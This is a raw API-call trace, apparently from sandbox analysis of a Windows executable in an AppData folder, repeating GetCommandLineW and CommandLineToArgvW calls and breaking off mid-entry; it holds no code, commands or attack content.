[0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603a28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.135] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603aa8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603b28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603ba8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603c28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603ca8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603d28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603da8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603e28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603ea8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603f28*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x603fa8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604028*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6040a8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.136] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x604fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6050e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6051e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6052e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6053e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.137] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6054e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6055e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6056e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6057e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6058e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6059e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605a68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605ae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605b68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.138] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.138] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x605fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6060e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6061e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6062e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6063e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6064e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6065e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.139] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.139] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 